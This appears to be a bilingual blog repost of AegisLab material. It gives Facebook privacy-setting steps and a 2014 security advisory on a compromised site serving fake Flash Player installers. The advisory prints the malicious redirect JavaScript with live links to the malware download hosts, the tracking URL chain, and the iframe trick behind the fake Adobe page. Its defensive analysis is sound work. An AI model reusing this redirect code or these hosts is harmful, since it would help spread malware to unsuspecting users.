讓大家免於受這些購物粉絲社群標記所擾!
1). 首先,開啟你Facebook個人帳戶設定中--
--的「動態時報與標籤」,
我們來設定「誰可以在我的動態時報新增貼文?」--
--和「我該如何管理別人加上的標籤以及標籤建議?」這2個選項吧!
*It turned out that labeling everyone who is in the photo where the account was stolen,
After his account was stolen by hackers ,
That will mark his friend in the photo in those shopping fan group .
AegisLab provides a simple set of teaching several steps in this ,
Let us immune to these shopping fan community marked by disturbed !
1 ) First, open your Facebook personal account settings -
- The "Dynamic Times and labels "
We set "Who can add postings in my timeline ? " -
- And " How do I manage other people 's labels and tags plus suggestions ? " This two options it !
*
*2). 設定「誰可以在我的動態時報新增貼文?」
誰可以在你的動態時報上發佈文章?
可以設定是「朋友」或「只限本人」。
設定為「只限本人」,不怕被盜帳號的朋友在你的塗鴉牆上發文了!
*2 ) Set "Who can add text posted on my timeline ? "
Who can publish articles on your timeline ?
You can set a " friend " or " Only I ."
Is set to " Only I ," not afraid of the stolen account your friends Posting a graffiti wall !
*審查朋友們把你標註在內的貼文,
是否要顯示在你的動態時報?
可以設定為「啟用」或「關閉」。
設定為「啟用」,
這樣標註你的貼文都必需透過你的審核,
才會顯示在你的動態時報。*Review your friends , including marked Posts ,
Do you want to appear in your timeline ?
Can be set to "Enable " or "off ."
Set "Enable" is ,
Such labels are necessary for your postings through
your audit ,
Will appear in your timeline .
*3). 設定「我該如何管理別人加上的標籤以及標籤建議?」
標籤出現在 Facebook 之前,
先檢查別人貼在你貼文中的標籤?
可以設定為「啟用」或「關閉」。
設定為「啟用」,
這樣當有人要標記你時,
都必須經過你的審查,才會被允許標記。*3 ) Set " How do I manage other people 's labels and tags plus suggestions ? "
Labels appear before Facebook,
Someone posted on your first check the label affixed
to the text ?
Can be set to "Enable " or "off ."
Set "Enable" is ,
So that when someone wants to tag you,
You must go through the review , will be allowed tag.
*
*當你被標註在貼文中時,
如果你要分享的朋友還沒在分享對象中,
你想加誰到分享名單?
可以設定為「朋友」、「只限本人」或「自訂」。
設定為「只限本人」,
這樣當你被標註在貼文時,
只有你自己會看到該貼文,
不會讓你的朋友們看到。
*When you paste the text is marked in time ,
If you are not a friend to share in the sharing of objects ,
Do you want to add a list of who to share ?
Can be set to "Friends ," " Only I " or "Custom ."
Is set to " Only I "
So that when you paste the text is marked in time ,
Only you will see the postings ,
Do not let your friends see .
*
*在有看起來像你的相片被上傳後,
誰可以看到姓名標籤建議?
可以設定為「朋友」或「沒有人」。
設定為「沒有人」,
這樣當有與你相像的照片被上傳後,
便不會出現你的姓名標籤建議了。
*There looks like in your photo is uploaded,
Who can see the name tag suggestions ?
Can be set to "friends" or " no one ."
Is set to " nobody "
So that when you have similar photos are uploaded ,
Your name will not appear label suggested .
*
*只要照著以上這些步驟,
那些惱人的購物社群要標記你時,
都得經過你審核才行,
而你被標記的貼文也只有你會看到,
不會影響到你Facebook上的好友了!
以上只是加強自己本身的隱私設定,
還必須讓身邊的朋友也知道這些隱私設定的重要性,
才能減少Facebook塗鴉牆上那些惱人的廣告訊息。
這些隱私設定都只是「治標」,
良好的使用習慣和基本的資安意識才是「治本」喔!
如何知道自己對哪些專頁按過讚及如何取消?
*Just follow these steps
Those annoying when you want to mark shopping community ,
You had to go through an audit job ,
And you paste text marked only you will see ,
Does not affect you, your friends on Facebook !
These are just strengthen its own privacy settings ,
You must also let her friends know the importance of these privacy settings,
Facebook Graffiti on the wall in order to reduce those
annoying advertising messages .
These privacy settings are only " temporary "
Good habits and basic information security awareness
is the " cure " Oh !
How do I know what special page on pressed praise and
how to cancel ?
*1). 點選「活動紀錄」
*1 ) Tap "Activity History"
*2). 點選「讚」、「專頁和興趣」
*2 ) Tap "Like" , " Fan Page and interests ."
*3).點選專頁右上方的編輯鈕,
即可「收回讚」或是檢舉對方 .
*3 ) Tap the Edit button at the top right special page ,
To " recover Like" or spotted each other.
------------------------------------------------------------------------
**再分享重要資訊--*請小心擬真度百分之百且同步更新的--
--假Adobe惡意網站!----安全通報2014-02-27~!*
AegisLab 近日發現了一個惡意網站: hxxp://www.ajyadgroup.net/old/ajyad_cpanel/ckeditor/
_samples/api_dialog/js.html
我們可以看出此惡意的 js.html 是位於 cpanel 裡的 ckediter 目錄
cPanel為一個後台管理系統,讓你透過網頁方式管理你的網站
CKEditer為一個使用在網頁上的所見即所得文字編輯器
這2個元件的漏洞時有所聞:
*cPanel Security = https://cpanel.net/category/security/
CKEditor 3.6.1 File Upload Vulnerability = http://www.bugsearch.net/en/13642/ckeditor-361-file-upload-vulnerability.html
CKEditor 4.0.1 – Multiple Vulnerabilities =
http://www.exploit-db.com/exploits/24530/
我們推測是這2個元件的問題,
才讓駭客將惡意的 js.html 塞到該目錄下
*這個網站會先判斷你的瀏覽器類型和版本、
作業系統、IP、Flash版本、AdobeReader版本等資訊,
再將你導至不同的 URL 下載一個假--
--的 Flash Player 安裝檔,
部份原始碼如下↓ *
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
| if ( "" == "Windows 8" ) { if ( cr == "sr" ) { window.location.assign( "http://adobeflashupdates.com/download/FlashPlayer11.9.1.exe" ); } else if ( cr == "ils" ) { window.location.assign( "http://adobeflashupdates.com/download/Flash Player IE 11.9.9.exe" ); } else if ( cr == "ars" ) { window.location.assign( "http://adobeflashupdates.com/download/FlashPlayer IE 11.9.exe" ); } else if ( cr == "ila" ) { window.location.assign( "http://adobeflashupdate1.com/download/install_flashplayer12.0.8.44.exe" ); } else { window.location.assign( "http://adobeflashupdates.com/download/FlashPlayer11.9.exe" ); } } else { if ( "" == "IE" ) { //alert("An update to your Adobe Flash Player is available"); if ( cr == "sr" ) { window.location.assign( "http://adobeflashupdates.com/download/FlashPlayer11.9.1.exe" ); } else if ( cr == "ils" ) { window.location.assign( "http://adobeflashupdates.com/download/Flash Player IE 11.9.9.exe" ); } else if ( cr == "ars" ) { window.location.assign( "http://adobeflashupdates.com/download/FlashPlayer IE 11.9.exe" ); } else if ( cr == "ila" ) { window.location.assign( "http://adobeflashupdate1.com/download/instalflashplayer12.0.0.44_ie.exe" ); } else { window.location.assign( "http://adobeflashupdates.com/download/FlashPlayer11.9.exe" ); } } else { //alert("An update to your Adobe Flash Player is available"); if ( cr == "sr" ) { window.location.assign( "http://adobeflashupdates.com/download/FlashPlayer11.9.1.exe" ); } else if ( cr == "ils" ) { window.location.assign( "http://adobeflashupdates.com/download/Flash Player non IE 11.9.9.exe" ); } else if ( cr == "ars" ) { window.location.assign( "http://adobeflashupdates.com/download/FlashPlayer non IE 11.9.exe" ); } else if ( cr == "ila" ) { window.location.assign( "http://adobeflashupdate1.com/download/installflashplayer12.0.0.44.exe" ); } else { window.location.assign( "http://adobeflashupdates.com/download/FlashPlayer11.9.exe" ); } } } |
*AegisLab所測試的惡意流程:
hxxp://www.ajyadgroup.net/old/ajyad_cpanel/ckeditor/_samples/api_dialog/js.html
→ hxxp://142.0.79.184/agent/agent.php?cr=ila
→ hxxp://142.0.79.184/agent/agent_check.php?ip=114.44.216.107&cr=ila
→ hxxp://142.0.79.184/agent/agent_save.php?cr=ila&Browser_Type=IE&Browser_Version=6.0&OS=Windows+XP&OS_Version=&IP=114.44.216.107
&referer=&Flash=11,5,502,146&Shockwave=null&Silverlight=null&VLC=null&WindowsMediaPlayer=
9,0,0,3250&PDFReader=null&AdobeReader=9,5,0,0&DevalVR=null&QuickTime=null&RealPlayer=null
&IE_ActiveX=true
最後下載的假 Flash Player 安裝檔: hxxp://adobeflashupdate1.com/download/instalflashplayer12.0.0.44_ie.exe *(en)*
*cPanel is a backstage management system that
allows you to manage your way through the web site
CKEditer use on a website WYSIWYG text editor
Vulnerability of these two elements often heard :
cPanel Security = https://cpanel.net/category/security/
CKEditor 3.6.1 File Upload Vulnerability = http://www.bugsearch.net/en/13642/ckeditor-361-file-upload-vulnerability.html
CKEditor 4.0.1 - Multiple Vulnerabilities =
http://www.exploit-db.com/exploits/24530/
We speculate that these two elements are the problem ,
and will only let malicious hackers js.html stuffed
into that directory
This site will first determine your browser type and version, operating system , IP, Flash version ,
AdobeReader information such as version ,
You then lead to a different URL to download a fake -
- The Flash Player installation file ,
Part of the source code below ↓
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
| if ( "" == "Windows 8" ) { if ( cr == "sr" ) { window.location.assign( "http://adobeflashupdates.com/download/FlashPlayer11.9.1.exe" ); } else if ( cr == "ils" ) { window.location.assign( "http://adobeflashupdates.com/download/Flash Player IE 11.9.9.exe" ); } else if ( cr == "ars" ) { window.location.assign( "http://adobeflashupdates.com/download/FlashPlayer IE 11.9.exe" ); } else if ( cr == "ila" ) { window.location.assign( "http://adobeflashupdate1.com/download/install_flashplayer12.0.8.44.exe" ); } else { window.location.assign( "http://adobeflashupdates.com/download/FlashPlayer11.9.exe" ); } } else { if ( "" == "IE" ) { //alert("An update to your Adobe Flash Player is available"); if ( cr == "sr" ) { window.location.assign( "http://adobeflashupdates.com/download/FlashPlayer11.9.1.exe" ); } else if ( cr == "ils" ) { window.location.assign( "http://adobeflashupdates.com/download/Flash Player IE 11.9.9.exe" ); } else if ( cr == "ars" ) { window.location.assign( "http://adobeflashupdates.com/download/FlashPlayer IE 11.9.exe" ); } else if ( cr == "ila" ) { window.location.assign( "http://adobeflashupdate1.com/download/instalflashplayer12.0.0.44_ie.exe" ); } else { window.location.assign( "http://adobeflashupdates.com/download/FlashPlayer11.9.exe" ); } } else { //alert("An update to your Adobe Flash Player is available"); if ( cr == "sr" ) { window.location.assign( "http://adobeflashupdates.com/download/FlashPlayer11.9.1.exe" ); } else if ( cr == "ils" ) { window.location.assign( "http://adobeflashupdates.com/download/Flash Player non IE 11.9.9.exe" ); } else if ( cr == "ars" ) { window.location.assign( "http://adobeflashupdates.com/download/FlashPlayer non IE 11.9.exe" ); } else if ( cr == "ila" ) { window.location.assign( "http://adobeflashupdate1.com/download/installflashplayer12.0.0.44.exe" ); } else { window.location.assign( "http://adobeflashupdates.com/download/FlashPlayer11.9.exe" ); } } } |
*AegisLab tested malicious process:
hxxp :/ / www.ajyadgroup.net / old / ajyad_cpanel / ckeditor / _samples / api_dialog / js.html
→ hxxp :/ / 142.0.79.184/agent/agent.php? Cr = ila
→ hxxp :/ / 142.0.79.184/agent/agent_check.php? Ip = 114.44.216.107 & cr = ila
→ hxxp :/ / 142.0.79.184/agent/agent_save.php? Cr = ila & Browser_Type = IE & Browser_Version = 6.0 & OS = Windows + XP & OS_Version = & IP = 114.44.216.107
& referer = & Flash = 11,5,502,146 & Shockwave = null & Silverlight = null & VLC = null & WindowsMediaPlayer =
9,0,0,3250 & PDFReader = null & AdobeReader = 9,5,0,0 & DevalVR = null & QuickTime = null & RealPlayer = null
& IE_ActiveX = true
Finally, download the fake Flash Player installation file :
hxxp://adobeflashupdate1.com/download/instalflashplayer12.0.0.44_ie.exe
--------------------------------
*這個假的 Flash Player 為病毒,在virustotal的偵測率:(23/48) =
= https://www.virustotal.com/en/file/a54cb6c8b5989c76a942ca9350a53d4c3c9068a647ec5bb697e16c12c1c83f50/analysis/
有趣的是…``
最後下載的PE URL的host -
adobeflashupdate1.com,
頁面看起來跟真的一模一樣,
這真的是 Adobe 官方的站嗎??!!@?
*This fake Flash Player for the virus , the detection rate in virustotal : ( 23 /48 ) =
= Https://www.virustotal.com/en/file/a54cb6c8b5989c76a942ca9350a53d4c3c9068a647ec5bb697e16c12c1c83f50/analysis/
Interestingly ... `
Download the PE URL host the final -
adobeflashupdate1.com,
Page looks exactly the same with the real ,It
It's really is Adobe 's official stand it??!! @
*#左上方的 Adobe 標誌連結也是連到 www.adobe.com ,
但看其網頁原始碼就發現真相了!
1
2
3
4
5
6
7
8
9
| < html > < body > < iframe src = "http://www.adobe.com" width = "100%" height = "100%" frameBorder = "0" > < p >Your browser does not support iframes.</ p > </ iframe > </ body > </ html > |
原來,它在裡面嵌了一個 www.adobe.com 的 iframe 在裡面,所以看起來才會跟 Adobe 官網一模一樣
adobeflashupdate1.com 在virustotal的偵測率:(7/53)
AegisLab WebGuard 已將 [D]adobeflashupdate1.com 加至rule中阻擋,提醒客戶隨時保持 WebGuard signature 的更新! -----------------------------
*en# Adobe logo at the top left link is also connected to www.adobe.com,
But looking at their page source discovered the truth !
1
2
3
4
5
6
7
8
9
| < html > < body > < iframe src = "http://www.adobe.com" width = "100%" height = "100%" frameBorder = "0" > < p >Your browser does not support iframes.</ p > </ iframe > </ body > </ html > |
*Originally, it is embedded inside a www.adobe.com of -
- Iframe inside,
So it looks exactly the same only with Adobe 's official website ! ! !
adobeflashupdate1.com in virustotal detection rate: (7/53) =
= Https://www.virustotal.com/en/url/3e8f7243be9d55d2182a6c5d26028f2721bb6ce7375c9eec37a45eff740df064/analysis/
AegisLab WebGuard has -
- [D] adobeflashupdate1.com
-added to the rule in the block ,
Remind customers to stay in WebGuard signature updates !*
**知識分享-"排除惡意之人的行為< -- "加強你的Facebook隱私設定 ,
---> "讓你免於被惱人的購物社群標記~!!及 -重要資訊*請小心擬真度百分之百 -且同步更新的假Adobe惡意網站!-- --安全通報2014-02-27~!*
-USA(en)-* Knowledge Sharing - " to exclude malicious human behavior < - "Strengthening your Facebook privacy settings
--- > "Let your shopping community from being annoying tag ~ ! ! And , And important information-*Please be careful hundred percent degree of verisimilitude and synchronized updates malicious fake Adobe website ! -- Security Advisory 2014-02-27~*!
===Sincerely === THE END === Melody.Blogger~===>/